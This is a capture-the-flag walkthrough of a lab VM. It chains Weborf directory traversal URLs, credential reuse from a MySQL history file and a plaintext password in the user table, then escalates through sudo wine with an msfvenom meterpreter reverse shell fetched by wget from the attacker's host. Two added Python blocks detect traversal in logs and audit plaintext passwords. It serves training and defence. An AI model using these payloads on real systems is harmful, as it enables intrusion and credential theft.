1. Find the target's IP: 192.168.0.128
nmap -sn 192.168.0.0/24
2. Scan the target's ports
root@kali:~# nmap -p- -A 192.168.0.128
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.128
Host is up (0.00044s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 37:dd:45:a2:9b:e7:bf:aa:30:e3:f0:96:ac:7c:0b:7c (RSA)
| 256 b4:c2:9b:4d:6f:86:67:02:cf:f6:43:8b:e2:64:ea:04 (ECDSA)
|_ 256 cb:f2:e6:cd:e3:e1:0f:bf:ce:e0:a2:3b:84:ae:97:74 (ED25519)
80/tcp open http nginx/1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.0.107' is not allowed to connect to this MariaDB server
8080/tcp open http-proxy Weborf (GNU/Linux)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-methods:
|_ Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-server-header: Weborf (GNU/Linux)
|_http-title: Weborf
| http-webdav-scan:
| Server Type: Weborf (GNU/Linux)
| Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|_ WebDAV type: Apache DAV
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:5B:26:2C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.0.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.26 seconds
3. Port 80 serves the default nginx welcome page. Going by previous experience, set it aside for now.
4. Move straight to port 8080, which is served by Weborf 0.12.2 (the version is also visible in the detailed port-scan output). There is an html directory containing a single html file.
A Baidu search for vulnerabilities in this server returns a directory traversal vulnerability as the first hit, and it applies to this version.
The article includes the exploitation method. First request the /etc/passwd file: it shows three login users on the system: root, sunrise and weborf.
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
5. Check what is in the two users' home directories
(1) Start with sunrise: a user.txt file is found in the home directory
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
Requesting it yields the first flag
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
The listing of sunrise's home directory shows no hidden files. Fetching .bash_history and .mysql_history directly returns nothing, which raises the question of whether hidden files are merely not listed or genuinely absent. Requesting .bash_logout succeeds, so hidden files exist but are simply not listed.
(2) Looking at weborf's home directory, only a single folder is found
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
Try those hidden files again anyway: .mysql_history does contain information, namely that the MySQL user weborf's password was changed to iheartrainbows44
http://192.168.0.128:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
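Defender-side view of the encoded traversal used above. This is an added example, not code from the original writeup or from Weborf: it scans constructed nginx-style access-log lines (modelled on the requests shown here) for requests whose percent-decoded path climbs above the document root, including double-encoded `%252f` and backslash variants, while leaving legitimate `docs/../index.html` style paths alone. Log lines, client address and file names are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (nginx "combined" format), modelled on the
# requests made in this walkthrough; they are not from the original page.
SAMPLE_LOG = """\
192.168.0.107 - - [19/Jul/2020:18:01:02 +0800] "GET /html/ HTTP/1.1" 200 326 "-" "curl/7.68.0"
192.168.0.107 - - [19/Jul/2020:18:01:09 +0800] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1804 "-" "Mozilla/5.0"
192.168.0.107 - - [19/Jul/2020:18:01:15 +0800] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.107 - - [19/Jul/2020:18:02:00 +0800] "GET /..%252f..%252f..%252fetc%252fshadow HTTP/1.1" 404 202 "-" "Mozilla/5.0"
192.168.0.107 - - [19/Jul/2020:18:02:30 +0800] "GET /html/docs/../index.html HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def decode_path(target, max_rounds=3):
    """Drop the query string and percent-decode until stable, so a
    double-encoded %252f (-> %2f -> /) is normalised too."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")  # treat backslashes as separators


def escapes_root(path):
    """True when walking the segments ever climbs above the document root:
    /html/docs/../index.html stays inside, /../etc/passwd does not."""
    depth = 0
    for segment in path.split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def find_traversal(log_text):
    """One record per log line whose decoded request path escapes the root."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path = decode_path(match.group("target"))
        if escapes_root(path):
            hits.append({"line": line_no, "client": line.split(" ", 1)[0],
                         "status": match.group("status"), "path": path})
    return hits
```

The status code matters for triage: a 200 on an escaped path (as with /etc/passwd above) means the server actually handed the file out, whereas a 404 only records the attempt.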
Attempting to connect to the database remotely fails; remote connections are presumably disabled. So try the same username and password over SSH instead, and the login succeeds
root@kali:~# mysql -h 192.168.0.128 -u weborf -p
Enter password: iheartrainbows44 (not echoed)
ERROR 1130 (HY000): Host '192.168.0.107' is not allowed to connect to this MariaDB server
root@kali:~# ssh weborf@192.168.0.128
The authenticity of host '192.168.0.128 (192.168.0.128)' can't be established.
ECDSA key fingerprint is SHA256:4yaOo7mwlBs//3V1VVqqtiApksgelyI4AJwhIUfz0UQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.128' (ECDSA) to the list of known hosts.
weborf@192.168.0.128's password: iheartrainbows44 (not echoed)
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
weborf@sunrise:~$
6. Running sudo -l shows that this user is not allowed to use sudo
weborf@sunrise:~$ sudo -l
[sudo] password for weborf:
Sorry, user weborf may not run sudo on sunrise.
So connect to the database locally and look for useful information. First check whether the weborf user is restricted to local logins; the query shows that every user is limited to localhost
weborf@sunrise:~$ mysql -uweborf -piheartrainbows44
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 52
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> select user,host from user;
+---------+-----------+
| user | host |
+---------+-----------+
| root | localhost |
| sunrise | localhost |
| weborf | localhost |
+---------+-----------+
3 rows in set (0.000 sec)
Next dump the whole user table: sunrise's password is stored in plaintext
MariaDB [mysql]> select * from user;
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | unix_socket | *AF554C323F838EB43A3D464034692C0994346ED8 | N | N | | 0.000000 |
| localhost | sunrise | thefutureissobrightigottawearshades | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
| localhost | weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | | N | N | | 0.000000 |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
3 rows in set (0.001 sec)
Try this password to switch to the system user sunrise, and it works too
MariaDB [mysql]> exit
Bye
weborf@sunrise:~$ su sunrise
Password: thefutureissobrightigottawearshades (not echoed)
sunrise@sunrise:/home/weborf$
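An added audit, not from the original writeup, for the two weaknesses this step exposes: a mysql.user Password column holding a non-hash value, and a password recovered from a history file or a table dump that is still live for an account. The rows are constructed from the columns shown in the dump above; mysql_native_password() reproduces MariaDB's PASSWORD() function ('*' followed by the upper-case hex of SHA1(SHA1(pw))), and matching_users() lets a defender test a leaked candidate against both hashed and plaintext-stored accounts.

```python
import hashlib
import re

# Constructed rows modelled on the `select * from user` output above,
# reduced to the columns this audit needs (not the page's own code).
SAMPLE_ROWS = [
    {"User": "root", "Password": "*C7B6683EEB8FF8329D8390574FAA04DD04B87C58", "plugin": "unix_socket"},
    {"User": "sunrise", "Password": "thefutureissobrightigottawearshades", "plugin": ""},
    {"User": "weborf", "Password": "*A76018C6BB42E371FD7B71D2EC6447AE6E37DB28", "plugin": ""},
]

# A mysql_native_password hash is '*' followed by 40 upper-case hex digits.
NATIVE_HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")


def mysql_native_password(plaintext):
    """Reproduce PASSWORD(): '*' + hex(SHA1(SHA1(plaintext))), upper-case."""
    inner = hashlib.sha1(plaintext.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def audit_user_rows(rows):
    """Map each user whose Password column is not a proper hash to a finding."""
    findings = {}
    for row in rows:
        pw = row["Password"]
        if NATIVE_HASH_RE.match(pw):
            continue  # stored as a native hash, as expected
        if pw == "" and row["plugin"]:
            continue  # authentication delegated to a plugin such as unix_socket
        if pw == "":
            findings[row["User"]] = "empty password and no auth plugin"
        else:
            findings[row["User"]] = "Password column is not a hash (plaintext?)"
    return findings


def matching_users(rows, candidate):
    """Users for whom a leaked candidate password is still valid, whether the
    column holds its native hash or the plaintext itself."""
    digest = mysql_native_password(candidate)
    return [row["User"] for row in rows if row["Password"] in (digest, candidate)]
```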
7. sudo -l shows that the wine command may be run as root; wine is what lets a Linux system run exe files
sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise: thefutureissobrightigottawearshades (not echoed)
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine
Generate a payload with msfvenom and start a simple web server with python
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
root@kali:~# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Download it onto the target and give it 777 permissions
sunrise@sunrise:/home/weborf$ cd ~
sunrise@sunrise:~$ wget http://192.168.0.107:8080/shell.exe
Connecting to 192.168.0.107:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73802 (72K) [application/x-msdos-program]
Saving to: ‘shell.exe’
shell.exe 100%[=====================>] 72.07K --.-KB/s in 0.009s
(7.94 MB/s) - ‘shell.exe’ saved [73802/73802]
Start a listener in msfconsole
root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.107
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.107:4444
Run the file with wine
sunrise@sunrise:~$ sudo wine shell.exe
The reverse shell comes back successfully
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.107:4444
[*] Sending stage (176195 bytes) to 192.168.0.128
[*] Meterpreter session 1 opened (192.168.0.107:4444 -> 192.168.0.128:39372) at 2020-07-19 18:16:52 +0800
meterpreter >
Enter the root directory and get the final flag
meterpreter > cd /root
meterpreter > ls
Listing: Z:\root
================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1602 fil 2019-12-06 06:24:31 +0800 .ICEauthority
100666/rw-rw-rw- 104 fil 2019-12-06 06:40:27 +0800 .Xauthority
100666/rw-rw-rw- 96 fil 2019-12-06 06:54:41 +0800 .bash_history
100666/rw-rw-rw- 570 fil 2010-01-31 19:52:26 +0800 .bashrc
40777/rwxrwxrwx 0 dir 2019-12-05 06:46:24 +0800 .cache
40777/rwxrwxrwx 0 dir 2019-12-05 04:48:21 +0800 .config
100666/rw-rw-rw- 35 fil 2019-12-05 04:46:34 +0800 .dmrc
40777/rwxrwxrwx 0 dir 2019-12-05 04:48:12 +0800 .gnupg
40777/rwxrwxrwx 0 dir 2019-12-05 03:29:33 +0800 .local
40777/rwxrwxrwx 0 dir 2019-12-05 06:46:29 +0800 .mozilla
100666/rw-rw-rw- 0 fil 2019-12-05 05:56:11 +0800 .odbc.ini
100666/rw-rw-rw- 148 fil 2015-08-17 23:30:33 +0800 .profile
40777/rwxrwxrwx 0 dir 2019-12-05 03:48:28 +0800 .rpmdb
100666/rw-rw-rw- 66 fil 2019-12-06 05:08:41 +0800 .selected_editor
40777/rwxrwxrwx 0 dir 2019-12-05 04:47:54 +0800 .ssh
100666/rw-rw-rw- 252 fil 2019-12-06 03:59:00 +0800 .wget-hsts
100666/rw-rw-rw- 2211 fil 2019-12-06 06:24:30 +0800 .xsession-errors
100666/rw-rw-rw- 2211 fil 2019-12-06 02:51:40 +0800 .xsession-errors.old
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Desktop
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Documents
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Downloads
40777/rwxrwxrwx 0 dir 2007-08-29 23:03:27 +0800 Groups
40777/rwxrwxrwx 0 dir 2007-08-29 23:03:27 +0800 Logs
40777/rwxrwxrwx 0 dir 2019-12-05 05:33:15 +0800 Manual
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Music
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Pictures
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Public
40777/rwxrwxrwx 0 dir 2019-12-05 05:33:15 +0800 Readme
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Templates
40777/rwxrwxrwx 0 dir 2007-08-29 23:03:26 +0800 Users
40777/rwxrwxrwx 0 dir 2019-12-05 04:46:51 +0800 Videos
100666/rw-rw-rw- 701 fil 2019-12-06 06:22:55 +0800 root.txt
meterpreter > cat root.txt
^^ @@@@@@@@@
^^ ^^ @@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ ^^
@@@@@@@@@@@@@@@@@@@@
~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
~ ~~ ~ ~ ~~~~~~~~~~~~~~~~~~~~ ~ ~~ ~~ ~
~ ~~ ~~ ~~ ~~ ~~~~~~~~~~~~~ ~~~~ ~ ~~~ ~ ~~~ ~ ~~
~ ~~ ~ ~ ~~~~~~ ~~ ~~~ ~~ ~ ~~ ~~ ~
~ ~ ~ ~ ~ ~~ ~~~~~~ ~ ~~ ~ ~~
~ ~ ~ ~ ~~ ~ ~
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
24edb59d21c273c033aa6f1689b0b18c
meterpreter >